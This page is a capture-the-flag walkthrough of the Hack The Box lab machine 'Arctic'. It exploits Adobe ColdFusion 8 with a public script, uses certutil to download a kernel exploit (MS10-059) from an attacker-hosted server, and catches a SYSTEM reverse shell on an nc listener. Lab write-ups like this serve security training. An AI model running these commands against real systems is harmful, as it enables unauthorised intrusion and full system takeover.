Nathanule's Write-ups
  • Nathanule's Write-Ups
  • Cheat sheets and Notes
    • Windows Privilege escalation
      • Communication with processes
      • Windows User Privileges
        • Windows Privilege Overview
        • SeImpersonate and SeAssignPrimaryToken
        • SeDebugPrivilege
    • SMTP
    • Directory brute-forcing (Fuzzing web directories)
    • Fuzzing Subdomains and Virtual hosts
    • Pivoting, Tunneling, and Port Forwarding
      • Pivoting around obstacles
      • Branching out our tunnels
      • Cheat sheets
    • Transferring Files
    • Powershell Notes
    • Active Directory Notes/Cheat sheets
      • Initial Enumeration
        • External Recon
          • Hunting E-mail addresses, usernames, credentials
      • External Information Gathering
  • Walk-throughs
    • HTB Windows Machines
      • APT
      • Mantis HTB
      • Reel HTB
      • Flight HTB
      • Visual HTB
      • Worker HTB
      • Fuse HTB
      • Buff HTB
      • Granny HTB
      • Grandpa HTB
      • Optimum HTB
      • Legacy
      • Jerry HTB
      • Silo HTB
      • Sizzle HTB
      • Tally HTB
      • Bart HTB
      • Jeeves HTB
    • HTB Linux Machines
      • Zipping HTB
      • devvortex HTB
      • Magic HTB
      • Bizness HTB
      • Sua
      • Mango HTB
      • Haircut HTB
      • Postman HTB
      • Friendzoned HTB
      • Mirai HTB
      • Networked HTB
      • Popcorn HTB
      • Posion HTB
      • Sunday HTB
      • SwagShop HTB
      • Irked HTB
      • Academy
    • HTB Endgames
      • Hades
      • Xen
      • P.O.O
      • Hololive THM
    • WPE Capstones
      • Querier HTB
      • Bastion HTB
      • Bastard HTB
      • Arctic HTB
      • Alfred THM
    • LPE Capstones
      • Brainpan 1 THM
      • ConvertMyVideo THM
      • Tomghost THM
      • Lazy Admin THM
      • Anonymous THM
    • Mobile
      • APKey
    • Snap-labs (Entry Level Pentesting)
    • Hardware
      • The needle
      • Debugging Interface
    • ICS and SCADA
      • Watersnake
    • Blockchain
      • Survival of the Fittest
Powered by GitBook
On this page
  1. Walk-throughs
  2. WPE Capstones

Arctic HTB

IP

PreviousBastard HTBNextAlfred THM

Last updated 1 year ago

10.10.10.11

Nmap

sudo nmap -sV -sC -A -oA nmap/results 10.10.10.11

we can see ports

135: RPC

8500: FMTP (Flight Message Transfer Protocol) quite old service

49164: RPC

we can use port number 8500 to access a web page

as we manually navigate through the directories (by the way very slow webpage) we do come across something interesting

http://10.10.10.11:8500/CFIDE/administrator

from this, we can tell the application runs

  • ADOBE COLDFUSION 8

using basic credentials doesn't work, but when we catch a request in Burp we do find some funky parameters

lets search for an exploit

searchsploit coldfusion

we can bring it down to our working directory

searchsploit -m cfm/webapps/50057.py

we need to modify the script and add our host IP and Port, Target machine IP

Now we can run the exploit

python3 50057.py

then we get a shell as tolis

Privilege Escalation via tolis

Lets gather some information on the machine

systeminfo | findstr /B /C:"OS Name" /C:"OS Version"

Nothing interesting with users and groups

What we can do is gather system information and run it through a tool such as wes-ng and see if we can find a exploit to elevate our privileges

First let's clone wes-ng onto our local machine

git clone https://github.com/bitsadmin/wesng.git

from our targets machine

systeminfo

Now we can just copy and paste the output into a file on our local machine called systeminfo.txt

to use wes-ng we first need to update the database in the directory we are working in

sudo python3 /opt/wesng/wes.py --update

running wes with our systeminfo.txt

sudo python3 /opt/wesng/wes.py systeminfo.txt

from the output of wes we can determine we can use ms10-059

first, we need to clone the following repo onto our local machine keep in mind this repo is quite large and you can clone the single MS10-O59 exploit 

git clone https://github.com/SecWiki/windows-kernel-exploits.git

let's cp MS10-059 into our working directory

cp /home/kali/Desktop/arctic/windows-kernel-exploits/MS10-059/MS10-059.exe ./

lets start a python3 server 

python3 -m http.server 8888

from our target machine we want to download the exploit we can use certutil

certutil -urlcache -split -f "http://10.10.16.4:8888/MS10-059.exe"

we should now have MS10-059 in onto our target machine

on our local machine let's start a Netcat listener with rlwrap

  • what does rlwrap do: provides read line's line editing, persistent history and competition, it gives us a more complete and stable shell

rlwrap nc -lvnp 443

Now lets run our exploit

MS10-059.exe 10.10.16.4 443

we now have a shell as nt authority\system